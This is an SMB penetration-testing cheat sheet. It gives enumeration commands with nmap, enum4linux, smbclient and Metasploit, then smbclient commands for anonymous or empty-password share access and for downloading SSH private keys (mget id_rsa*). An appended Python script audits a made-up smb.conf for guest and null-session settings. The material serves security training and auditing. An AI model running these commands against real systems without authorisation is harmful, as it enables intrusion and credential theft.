SMB Pentesting

Find and exploit SMB vulnerabilities

Enumeration

Using nmap

sudo nmap -sC -sV 10.10.170.245

Using enum4linux

enum4linux -a 10.10.170.245

Using smbclient

List all available shares

smbclient -N -L \\\\10.129.95.187\\

Using metasploit

use auxiliary/scanner/smb/smb_version

Exploitation

The smbclient utility and the impacket library are two useful tools for interacting with SMB services and exploiting SMB misconfigurations.

Using smbclient

Let's say we want to access an SMB share called "secret" as user "suit" on a machine with the IP 10.10.10.2 on the default port (445):

smbclient //10.10.10.2/secret -U "suit" -p 445

Anonymous login with empty passwords

On shares that allow it, either an empty username or the "Anonymous" user will do:

smbclient //10.10.96.221/profiles -U ''
smbclient //10.10.96.221/profiles -U 'Anonymous'

List all available files

smb: \> ls
smb: \> dir

Download one or more files (mget command)

smb: \.ssh\> mget id_rsa*
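The anonymous login shown above only works because the server's configuration permits it. As an added example that is not part of this cheat sheet, the following Python script audits a constructed Samba smb.conf for the settings that allow guest or null-session access (map to guest, restrict anonymous, guest ok); the sample configuration and share names are made up:

```python
"""Audit a Samba smb.conf for settings that permit anonymous/guest access.
Added example, not part of the original cheat sheet; the config is constructed."""
import configparser

# Constructed sample: a weak [global] section, one guest share, one restricted share.
SAMPLE_SMB_CONF = """
[global]
workgroup = WORKGROUP
map to guest = Bad User
restrict anonymous = 0

[profiles]
path = /srv/samba/profiles
guest ok = yes
read only = no

[secret]
path = /srv/samba/secret
valid users = suit
guest ok = no
"""


def parse_smb_conf(text):
    # smb.conf is INI-like; '#' and ';' both start comments, and values may
    # contain '%U'-style macros, so interpolation is disabled.
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.read_string(text)
    return cp


def audit_anonymous_access(text):
    """Return a list of (section, finding) tuples describing anonymous-access risks."""
    cp = parse_smb_conf(text)
    findings = []
    g = cp["global"] if cp.has_section("global") else {}
    # 'map to guest = Bad User' maps failed logins to the guest account, so an
    # empty-password login such as -U '' silently becomes a guest session.
    if g.get("map to guest", "never").strip().lower() != "never":
        findings.append(("global", "map to guest allows unauthenticated sessions"))
    # 'restrict anonymous = 0' (the default) permits null-session share listing (-N -L).
    if g.get("restrict anonymous", "0").strip() == "0":
        findings.append(("global", "restrict anonymous = 0 allows null-session enumeration"))
    for share in cp.sections():
        if share == "global":
            continue
        # 'public' is a Samba synonym for 'guest ok'.
        guest = cp[share].get("guest ok", cp[share].get("public", "no"))
        if guest.strip().lower() in ("yes", "true", "1"):
            findings.append((share, "guest ok = yes exposes the share without credentials"))
    return findings
```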
